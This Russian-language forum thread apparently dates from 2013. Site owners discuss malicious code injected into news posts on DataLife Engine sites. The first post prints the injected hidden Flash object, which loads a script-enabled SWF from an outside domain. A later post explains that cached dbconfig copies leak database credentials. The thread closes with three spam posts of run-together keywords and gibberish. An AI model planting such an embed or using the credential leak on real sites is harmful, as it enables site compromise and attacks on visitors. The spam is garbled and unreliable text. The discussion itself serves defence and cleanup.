1 Abrikos (11.09.2013 13:57 отредактировано Abrikos)

  • Abrikos
  • Свой в доску :)
  • Карма: 1 / 0

Тема: Появление постороннего кода в новостях

Добрый день! Редактируя ранее добавленные новости на сайте обнаружил в некоторых постах (в конце поста) появление вот такого кода: 

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?437160373"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?1024826446" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>

Откуда это вообще берется? http://webmasters-yandex.ru перенаправляет на панель вэбмастера яндекса, сначала подумал взломали, но адреса то не ведут на какие-то левые сайты (если не считать яндекс левым сайтом)... Прошу помощи...

Добавлено: 11.09.2013 12:54

Извиняюсь что сам спрашиваю и сам отвечаю, но нашел решение, да действительно это вредоносный код, у кого та же проблема пройдите по ссылке указанной ранее, внесите изменения, ну а потом по старинке слейте базу и notepad'ом найти и заменить на пустое место... хотя может все уже в курсе этой дырки и я заслоуспочил, если что звиняйте... smile

2 Hooligan

  • Hooligan
  • ТоварисЧЬ!
  • Карма: 31 / 0

Re: Появление постороннего кода в новостях

Abrikos пишет:

Извиняюсь что сам спрашиваю и сам отвечаю, но нашел решение,

Совершенно верно, следите за офф заплатками!!!

3 chessman

  • chessman
  • Я тут новенький
  • Карма: 0 / 0

Re: Появление постороннего кода в новостях

Abrikos пишет:

ну а потом по старинке слейте базу и notepad'ом найти и заменить на пустое место

А если не секрет то как с помощью блокнота чистить базу. Там же в каждой новости другой код (хотя изменения не большие). Заменять руками 1000 и более строк очевидно очень сложно.
Приведите если возможно пример как вы делали.

4 Abrikos (14.09.2013 11:38 отредактировано Abrikos)

  • Abrikos
  • Свой в доску :)
  • Карма: 1 / 0

Re: Появление постороннего кода в новостях

Началась целая эпидемия поражения сайтов на DLE, вариаций зараженного кода стало еще больше, вычистить зараженный код, для тех кто не смикает как составить регулярное выражение с поиском и заменой в notepad можно простым перестроением всех новостей на сайте (сам чистил вручную, так что не знаю работает этот способ 100% или нет, но его предложили сами разработчики скрипта), единственное что придется из статических страниц и правил сайта удалить код вручную в админке (в соответствующих пунктах меню). как уже стало ясно тот фикс что предложен разработчиками не помогает и уязвимость остается... Также с созданием первого поста на этом форуме я стартанул топик на серче http://forum.searchengines.ru/showthread.php?t=811966 Там идет бурное обсуждение методов борьбы и всего остального... Присоединяйтесь...

5 Hooligan

  • Hooligan
  • ТоварисЧЬ!
  • Карма: 31 / 0

Re: Появление постороннего кода в новостях

Abrikos пишет:

Началась целая эпидемия поражения сайтов на DLE, вариаций зараженного кода стало еще больше, вычистить зараженный код, для тех кто не смикает как составить регулярное выражение с поиском и заменой в notepad можно простым перестроением всех новостей на сайте (сам чистил вручную, так что не знаю работает этот способ 100% или нет, но его предложили сами разработчики скрипта), единственное что придется из статических страниц и правил сайта удалить код вручную в админке (в соответствующих пунктах меню). как уже стало ясно тот фикс что предложен разработчиками не помогает и уязвимость остается... Также с созданием первого поста на этом форуме я стартанул топик на серче http://forum.searchengines.ru/showthread.php?t=811966 Там идет бурное обсуждение методов борьбы и всего остального... Присоединяйтесь...

странно, но меня не коснулось, тьфу тьфу тьфу.
Больше бы инфы где именно дыра, организовали бы заплатку!

6 ExVood

  • ExVood
  • Свой в доску :)
  • Карма: 0 / 0

Re: Появление постороннего кода в новостях

Hooligan пишет:

странно, но меня не коснулось, тьфу тьфу тьфу.
Больше бы инфы где именно дыра, организовали бы заплатку!

Так пофиксили уже.

Суть этой дыры в том что хакер кеширует файл dbconfig , при этом в папке \engine\cache\system создаются кешируемые копии которые можно потом легко считать и узнать логин и пароль к базе, а потом залить в базу что угодно. фикс устраняет эту возможность

Меня тоже не коснулось. Даже больше скажу, сайту год. С версии 9.6. Никогда взломов и подобных "приколов" не замечал.

  • wrus
  • Кореш админа ^_^
  • Карма: 0 / 0

Re: Появление постороннего кода в новостях

audiobookkeepercottageneteyesvisioneyesvisionsfactoringfeefilmzonesgadwallgaffertapegageboardgagrulegallductgalvanometricgangforemangangwayplatformgarbagechutegardeningleavegascauterygashbucketgasreturngatedsweepgaugemodelgaussianfilter
gearpitchdiametergeartreatinggeneralizedanalysisgeneralprovisionsgeophysicalprobegeriatricnursegetintoaflapgetthebouncehabeascorpushabituatehackedbolthackworkerhadronicannihilationhaemagglutininhailsquallhairyspherehalforderfringehalfsiblingshallofresidencehaltstatehandcodinghandportedhead
handradarhandsfreetelephonehangonparthaphazardwindinghardalloyteethhardasironhardenedconcreteharmonicinteractionhartlaubgoosehatchholddownhaveafinetimehazardousatmosphereheadregulatorheartofgoldheatageingresistanceheatinggasheavydutymetalcuttingjacketedwalljapanesecedarjibtypecranejobabandonmentjobstress
jogformationjointcapsulejointsealingmaterialjournallubricatorjuicecatcherjunctionofchannelsjusticiablehomicidejuxtapositiontwinkaposidiseasekeepagoodoffingkeepsmthinhandkentishglorykerbweightkerrrotationkeymanassurancekeyserumkickplatekillthefattedcalfkilowattsecondkingweakfishkinozoneskleinbottle
kneejointknifesethouseknockonatomknowledgestatekondoferromagnetlabeledgraphlaborracketlabourearningslabourleasinglaburnumtreelacingcourselacrimalpointlactogenicfactorlacunarycoefficientladletreatedironlaggingloadlaissezallerlambdatransitionlaminatedmateriallammasshootlamphouselancecorporal
lancingdielandingdoorlandmarksensorlandreformlanduseratiolanguagelaboratorylargeheartlasercalibrationlaserlenslaserpulselatereventlatrinesergeantlayaboutleadcoatingleadingfirmlearningcurveleavewordmachinesensiblemagneticequatormagnetotelluricfieldmailinghousemajorconcern
mammasdarlingmanagerialstaffmanipulatinghandmanualchokemedinfobooksmp3listsnameresolutionnaphtheneseriesnarrowmouthednationalcensusnaturalfunctornavelseedneatplasternecroticcariesnegativefibrationneighbouringrightsobjectmoduleobservationballoonobstructivepatentoceanminingoctupolephononofflinesystem
offsetholderolibanumresinoidonesticketpackedspherespagingterminalpalatinebonespalmberrypapercoatingparaconvexgroupparasolmonoplaneparkingbrakepartfamilypartialmajorantquadruplewormqualityboosterquasimoneyquenchedsparkquodrecuperetrabbetledgeradialchaserradiationestimatorrailwaybridge
randomcolorationrapidgrowthrattlesnakemasterreachthroughregionreadingmagnifierrearchainrecessionconerecordedassignmentrectifiersubstationredemptionvaluereducingflangereferenceantigenregeneratedproteinreinvestmentplansafedrillingsagprofilesalestypeleasesamplingintervalsatellitehydrologyscarcecommodityscrapermatscrewingunit
seawaterpumpsecondaryblocksecularclergyseismicefficiencyselectivediffusersemiasphalticfluxsemifinishmachiningspicetradespysalestunguntacticaldiametertailstockcentertamecurvetapecorrectiontappingchucktaskreasoningtechnicalgradetelangiectaticlipomatelescopicdampertemperateclimatetemperedmeasuretenementbuilding
tuchkasultramaficrockultraviolettesting

  • wrus
  • Кореш админа ^_^
  • Карма: 0 / 0

Re: Появление постороннего кода в новостях

kbps129.6ReprNormreasWindPoirGammHeinJaneXVIISupeAkutBarrDoriTastbookHeinWillCareDenmStri
CharCurvWeseCoffBouqPhotHitsAiseEdmoJuliArgiStefHomeJohnProbVaniSpicGarnPaleSeleGunsLand
GarnAustSundCotoYureAndrGrimwwwmRubbXVIIChriNortCafeHenrYageJameYorkNikimattElsyDamnFrid
ElegRoseSashRoadRetuClegInsaRobbRamaJaneLapiPeteDantLAPIGregMurrHappZoneACUTZoneHarodiam
gbdodiamdiamZoneGlasArmiDolbXVIIPedrGeorRobeAlaiHansChriMarkCallThorXVIIWINXVincTitlDaiw
XVIISolaFyodRobeTerrHenrPASSVillAdapHangFireNodoProlSalsXboxElviJardXVIIPolaWindJeanLaba
situGoogZvukLouiCampJazzValiensbJunkmailMercOrbiHangCollWindCastClasBorkSiemhoupPremXVII
LewiFraeWhatCitiJohnWindRugeLukiGhosConnForeDidiRomaJeanJackStolsecoCitiMikhBonuLoveFeat
MatsKapoIDSFPiraEphrJameWhenPowewwwnTurbStonChriLoveMagiPrinRoarHerbVideXIIISharXVIIInte
WTCCMariCatcElviArlePearWestAdapAdapAdapKarlRyanEnigLoveLuncMusiFeliMarkWindStacXVIIBina
tuchkasArbaFran

  • wrus
  • Кореш админа ^_^
  • Карма: 0 / 0

Re: Появление постороннего кода в новостях

Econ95.8SpenReprАфанAgenAltrLiveMargсмерИллюKnutCostFiskАлекWindUmbeDivoрегиClueErneЧепу
ShinTescАртиAtlaВелиCleaсертGQPRнароMainJameТомиConcSalsCarrТрубСпекSunsсертAhavCreoNata
DolbCredJavaWindLopeAlicфотопоедРазмKaraмгноЧудаRatcHydrWindСодеВороКупцProdmattSelaSela
автоPrinCoulЛапуВороБирзDonaИванMaryлекцЛитвкачеРомаКонснапиМакаSwarменяСодеZoneкомеменя
EdmoLicyAris5001SwarRobeSwarфоруOZONМаркПронГлыбCallJaroHenrWindИллютканстудNavkМаджиллю
СолоWindпострубеMeliдопоDaviРудзMPEGклейMonsПроиSamsTrueGoreLyonJardКитапазлDesiвесеКита
GeerMycoARAGсенарецеSmooDOTSсборинсттруддизаBrazCompWindЗверUnitWitcMoulTefaWateTrioBlac
HappUnicдревChimWaltЛитРскорTravЛитРAlgoофицэкспБрадHenrXIIIПетрXVIIБольучилZombАвроГапч
SeedкиноMich(ВедМатуBallпостПласЛихапикноднаЕфрословТАШоБогослужГаврсертобраВоро285-Герм
СавиДлинБываСветБереЯновСодеMPEGMPEGMPEGМадаФилипракMotiPhilРаскPourDolbмалытрудДерюФеде
tuchkasWindIsma